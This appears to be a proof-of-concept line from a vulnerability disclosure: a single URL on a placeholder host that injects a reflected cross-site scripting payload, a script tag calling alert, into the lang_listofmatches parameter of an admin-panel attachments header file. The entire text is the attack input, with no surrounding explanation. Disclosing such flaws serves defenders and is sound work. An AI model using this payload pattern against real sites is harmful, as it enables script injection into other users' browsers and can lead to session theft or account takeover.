http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>